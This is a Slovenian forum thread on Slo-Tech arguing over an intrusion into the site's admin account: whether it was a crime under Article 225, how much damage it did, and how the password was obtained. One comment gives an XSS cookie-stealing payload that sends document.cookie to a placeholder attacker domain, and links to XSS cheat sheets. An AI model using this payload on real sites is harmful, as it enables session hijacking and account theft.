Popustil najšibkejši člen Slo-Techa

PicNIK, po tvoji logiki:

Vdor v banko slovenija naj bo preganjan, vdor v zasebno stanovanje ali prostore društva vrtnarjev pa ne. Seveda v slednjih primerih na steno na veliko napises da nisi nič ukradel. Potem pa lastniki to za tabo pucajo.

- O škodi. Če se sedaj nebi pogovarjali o tem potem škode nebi bilo. Tako pa je. 4 ali 6 ur dela na sistemu je praktično 0 v primerjavi z škodo " dobrega imena". V dobroime pa je bilo vloženih ogooomno ur in znanja.

WTF?!
Dobro ime? JA, očitno ni bilo dovolj ur in znanja, saj je nekomu uspeli prit noter. In temu primerno se je dobro ime malce zapacalo. Škoda je itak bila, lahko pa to delo vzamejo skrbniki kot izziv, ne kot žalitev in se grejo zjokati organom pregona, ker jih ne nekdo 'premagal'.

Če kraja gesla ni ne vem kaj, kaj potem tukaj sikaš in govoriš kako se je ime ST umazalo. Sm reku: Hek je hek nima veze na kakšen način, tudi če je fizično prebral bite iz RAM-a.

DCER:
Vdor v banko JE dosti bolj preganjan kot pa vdor v stanovanje ali v prostore društva. Če bi imel društvo ključavničarjev in bi imel UBER uštiman in zavarovan prostor in bi mi nekdo vseeno uspel priti noter s prekopiranim ključem in pustil listek: "sem prišel noter - U R PWNZED", bi se nasmehnil in zamenjal ključavnico (v primeru ST stane ključavnica zanemarljivo malo).

Pa ne preveč povezovat sveta iz kjer prihajajo pizzamani z digitalnim ;) .

Naj nekdo kontaktira g. Gorazd Božiča iz SI-CERT. Najverjetneje ima določene izkušnje z računalniškimi vdori in z njimi povezanimi sodnimi postopki (kot priča/izvedenec), zato lahko poda strokovno mnenje o morebitni kazni, ter olajševalnimi/obremenilnimi okoliščinami.

Možno je, verjetno pa ni !

se zgodi, sploh če so se vam gesla pretakala v plain textu (preko http). Potem ga je dokaj enostavno dobiti če si na istem switchu. Pa sej nima veze, glavno da ni naredil štale in zradiral foruma. (za kar bi tako verjetno rabil dostop do samega linuxa)

Da ne boste preveč pametovali, si še enkrat oglejmo 225. člen.

(1) Kdor neupravičeno vstopi v informacijski sistem - vseeno ali vstopi z ukradenim geslom ali s "hackom" (uporabo exploita).

(2) Kdor podatke v informacijskem sistemu neupravičeno uporabi, spremeni, preslika, prenaša, uniči ali v informacijski sistem neupravičeno vnese kakšen podatek - v konkretnem primeru: spremeni nastavitve accounta (povečanje pravic) ter objavi novico.

Se kaznuje ne samo z denarno, pač pa celo z zaporno kaznijo (do dveh let). Tudi, če samo poiskusi (in mu ne uspe).
In tudi, če ni bila povzročena velika škoda. Če bi bila, potem bi bila kazen le hujša.

Samo toliko, da malce razložim ta famozni 225. člen.

Saj ni problem vdor če mene vprašate. Problem je to da so ST vdrl. Kaj se to pravi. Tega se pa res ne sme a. Mislim kaj se dajete. Pač mulca rajš potegnite v ekipo bo boljš kot da ga neki kaznujete. EGO vam je prizadel verjetno vas to najbolj boli. No sej bomo vidli če bom dobu persona rudis

Hej, ce se clovek hoce igrat, naj si doma postavi en red hat in se naj znasa nad njim. Jaz pa rad pridem na slo-tech, ker je tu dobra klapa, vedno pripravljena za flejmanje.

Verjamem, da je Primoz se vedno dovolj sposoben in da ima streznik nastavljen tako, kot mogoce se najvec dva cloveka, ki obiskujeta to stran, tako da do vecjega vdora ni moglo priti.

Po takojšnjem ukrepanju se je ugotovilo, da je enemu od petih uporabnikov Slo-Techa z največ pravicami na za zdaj še neznan način "ušlo" geslo.

Zakaj neznan??? Ce je uporabil XSS nacina napada verjetno sploh ni dobil administratorjevo geslo, ampak je enostavno ukradel njegov cookie.
To se pravi je moral narediti enega dummy userja, s katerim je postal en komentar, post, prijavo v stilu :
< script >document.location='http://enaXXXdomena/cookie.php? '%20+document.cookie< /cript > (obstaja 1001 nacin kako embedat js v page)
Potem pa je nic hudega slutec administrator pogledal post (komentar, whatever) in poslal svoj cookie na en drug server (od evil hakerja).

Ena moznost je da si server zapomni uporabnikov ip in ga primerja z vsakim requestom (1 cookie == 1 ip). Samo potem odpade samodejna prijava.

Par linkov v kaj vse se lohka skrije javascript: http://www.cgisecurity.com/articles/xss..., http://www.technicalinfo.net/papers/CSS... http://ha.ckers.org/xss.html (ta zadnji link ti se pove kaj bo delalo pod katerim browserjem) Pa ni hudic da ne bi ker nacil delal tut na slo-techu.

Ni kaj pobje, bo treba it na slikovna gesla pa odtis nipla

"brez zamere", ce ti recem da si len, ampak lahko bi prebral ze napisano.

Ja sem vse prebral ce pa je skoda to da je dela pol par ur pa gledi koker mislis, boljse danes par ur kot pa vse fuč

> obstaja 1001 nacin kako embedat js v page

Ako se ne motim, je dovolj pravilno escapanje nekaj znakov in vseh 1001 nacinov gre po vodi. Edina mozna tezava je, da slo-tech dopusca tudi slike, kjer pa IE pusti izvajat JS...

Hehe, ker po pravilih ne smes imet dveh racunov. Dvojnih pravil, ene za admine, druge pa za uporabnike pa pač ne moreš imet.

Oz. drug odgovor: ker nima smisla toliko omejevat stvari, saj potem ni več tolikšne fleksibilnosti.

... samo nimamo vsi vedno istega IPja!

pomoje da se ni konetal iz svojega staitc IPja ali pac ;)

mspiller:

> Zakaj neznan??? Ce je uporabil XSS nacina napada verjetno sploh ni dobil administratorjevo geslo, ampak je enostavno ukradel njegov cookie.

Načeloma je razčiščeno, da NI šlo za XSS metodo. To izhaja takoj iz drugega naslednjega stavka :-).

Glede primerjav med "umorom" in "neupravičenim vstopom v informacijski sistem": Kazenski zakonik varuje različne kazenskopravne dobrine. Inkriminacija umora tako pred neupravičenimi posegi varuje človekovo telo in življenje, 225. člen pa (v okviru kaznivih dejanj, ki ščitijo "premoženje") integriteto (celovitost, neokrnjenost) informacijskih sistemov. Pri tem gre lahko za posebno (specifičnejšo) vrsto "poškodovanja tuje stvari". Že sama primerjava z 242. členom, ki inkriminira "vdor v informacijski sistem" in je (izrečno) omejen na varovanje gospodarskih interesov [torej se vdor zgodi pri gospodarskem poslovanju], daje argument za dejstvo, da 225. člen inkriminira tudi "negospodarske" sisteme, torej take, ki jih nekateri sodelujoči v tej temi označujete za domala varstva nevredne. Res pa je, da so ti sistemi manj varovani od "gospodarskih", kar se odraža tudi v sami kazni.

Vendar nižja kazen nikakor ne da argumenta, da gre potem taka dejanja "manj resno preganjat". Intenzivnost je namreč vsebovana že v [milejši] kazni. Ravno eksplicitna določenost za pregon tudi tovrstnih "milejših" dejanj pa je argument za primerljivo enako intenziven pregon.

Glede morebitne bagatelnosti dejanja gre opozorit še na dejstvo, da je že sam poskus kaznivega dejanja iz 2. odstavka (vnos, uporaba, preslikava podatkov ...) kazniv, čeprav je za kaznivost poskusa sicer splošno potrebna hujša zagrožena kazen (3 let), medtem ko je za to dejanje predpisana kazen do 2 let. Zakonodajalec očitno priznava pomembnost nekomprimiranosti informacijskih sistemov.

Pri tem gre opozorit tudi na storilčev odnos do dejanja. Iz dejstva, da kljub temu, da ima svoje vstopne parametre (uporabniško ime, geslo), vseeno uporabi parametre nekoga drugega, čeprav se zaradi poznavanja sistema mora zavedat, da je to nedopustno, nikakor ne morem sestavit pomislekov o kakršnikoli "zmoti" storilca oz. drugem dejstvu, ki bi izključeval njegov direktni (če ne že obarvani) naklep. Glede na to, da z dejanjem po "vstopu" v sistem ni prenehal, ampak je začel izvrševat še znake kvalificirane oblike (torej vnos in sprememba podatkov), se takoj prične postavljat vprašanje njegove "dobronamernosti".

(Tega vprašanja pa ni več po tem, ko objavi novico s precej bombastično sliko in lažnimi navedbami. Še posebej, ko mu je novica DVAKRAT brisana, a jo še dodatno dvakrat ponovno objavi. Vandalizem.)

Oh cheesus..

Luknja... In kako bodo popravili to luknjo? Bodo uvedli login brez gesla, ali bodo naredili, da se ne moraš logirat?

Ni šlo za varnostno luknjo v sistemu (po sedaj napisanem od adminov), ampak je šlo za nelegitimen vstop v sistem z uporabo osebnih podatkov nekega 3jega uporabnika. Edina luknja je lahko ta, da ta admin ni dovolj skrbno čuval gesla. Ampak to še ne pomeni, da je luknja v sistemu. Admini niso del sistema, so le njegovi upravitelji.

Še vedno ni jasno... kako lahko napišeš, da ni naredil nič? Objavil je izmišljeno novico, zaradi njega veliko ljudi ni moglo dostopati do strani, ustvaril je nekaj ur dela adminom, v končni fazi je lahko tudi povzročil izpad dobička zaradi nezmožnosti prikazovanja oglasov. Če nebi naredil nič, nebi imeli o čem govoriti, kot je nekdo že povedal. Na to temo, je pa že precejšnje število odgovorov, torej to, da ni naredil nič ne moreš reči. Lahko poskušaš zagovarjati edino, da ni naredil nič takega, kar bi ogrozilo kakšno življenje...

_dobro_delo_ bi bilo to, da če bi našel geslo, da bi pisal adminu, ki je geslo "zgubil" in mu to povedal. To bi bilo dobro delo. Ampak on je hotel biti heroj, hotel je, da folk ve za njega in hotel si je pridobiti slavo. To ni dobro delo, to je usurpacija, izkoriščenje blatenja tujega imena za izboljšanje svojega.

Da ni blatil imena ST? Seveda ga je, s tem, ko je govoril, da je udrl zaradi pomankljivosti v Xss. S tem je imliciral, da ima ST to slabo rešeno, kar pa glede na to, da ni prišel tako noter, ne more vedeti. Torej je nekaj špekuliral. Seveda, če bi napisal, da je ukradel geslo nebi bil pol toliko zanimiv.

Vse zgoraj napisano seveda velja če drži tisto, kar so pisali admini, o kraji gesla.

Jst se popolnoma strinjam s PicNiKom..
Tole vsekakor je kaznivo dejanje, tle ni nobenga dvoma. Ampak je heker oz. "heker" kakor ga pač želite smatrati, uporabil najbolj milo obliko, ter vam sporočil da se da priti noter. Mogoče malo zbudil admine:) Pa ne morete primerjati vdor v nek ST, z vdorom v banko ipd. In moralno se mi ne zdi nič narobe, razen tega da je adminom povzročil nekaj ur dela, hkrati jih je pa opozoril na ranljivost.
Kapo dol.
Sicer pa this things happen. Še wedno pa sm prepričan da je ST z admini na čelu varen portal;)

Mater ste glupi (pardon izrazu).

Vkradel je geslo. Našel je geslo. Videl je geslo. Nekaj od tega. Naj vam prosim potegne.

[Namenjeno raznim R33D3M33R(om), TekO(tom) in mtosev(om), ki še zdaj niso prebrali, da ni šlo za varnostno luknjo.]

Brez zamere.

Kaj ti ni jasno?

Pomembno je le v toliko, da se ve ali je šlo za malomarnost enega od petih, ali pa le ta na to ni mogel vplivati.
Konec koncev te noben sistem ne reši, če ti je nekdo našraufal keyloger.

Imas prav, Microsoft. Ampak nobeno od tega ni varnostna luknja v Slo-Techu. Edina razlika med temi nacini je, da ti povedo, ali je user, ki so mu ukradli geslo, tega zapravil po lastni neumnosti, ali pa so ga ukradli zaradi katere od lukenj v njegovem operacijskem sistemu/browserju.

Jao keri komentarji... grem stavt da se dle tale trenutek on k je vdru vala po tleh pa smeji temle komentarjem na ves glas ker tud če ga izsledite, mu ne boste mogl nič (če je pameten je že zdavni naredu popolni format diska z 32 kratnim prepisovanjem z naključnimi podatki (NSA stuff)).

Sicer pa admini ne vem zakaj zanikate luknje na S-T, ker obstajajo in XSS je možen na 1000 in 1 način, tud na takšne nečine, da noben log ne zabeleži kaj sumlivega

Kar se pa njegovega dela tiče, pravite da je imel dostop samo nekaj malega časa... hmm really vi samo veste da ga je imel nekaj malega, prej pa je lahko on že ceu server na disk pretoču, zapeku na en ali več DVDjev, jih zakopal za bajto in bo počaku da se prah po temle poleže, nato bo pa začel na veliko crackati md5 gesla

Vsi, ki dajete komentarje, da je tipa ustrezno in edino pravilno kaznovati.

A se spomnete, kako ste se vsi jezili in bili sploh napihnjeni, ko je prisla novica o nameravanem hudem kaznovanju tiste najstnice okrog 10 let stare iz ZDA, ker si je drznila downloadad svojo najljubšo skladbo. Evo to vam je isto.

Tiste, ki bi pa radi, da se mu ne vem kaj o njegovem spolnem organu na hrbet napiše, bi pa najraje povabil v A kanal, da bi vam pred televizijskimi kamerami pokazali, kako to že počnejo v "tistih" državah (ja, obnašate se kot v otroštvu zlorabljene misice).

In višina kazni,... vdrl je u en slo-tech.... za božjo voljo,... V SLO-TECH!!!!!,.... najbolj da vsakega mulca, ki čokolado ukrade damo kr na grmado (da ne bo slučajno kdaj banke oropal).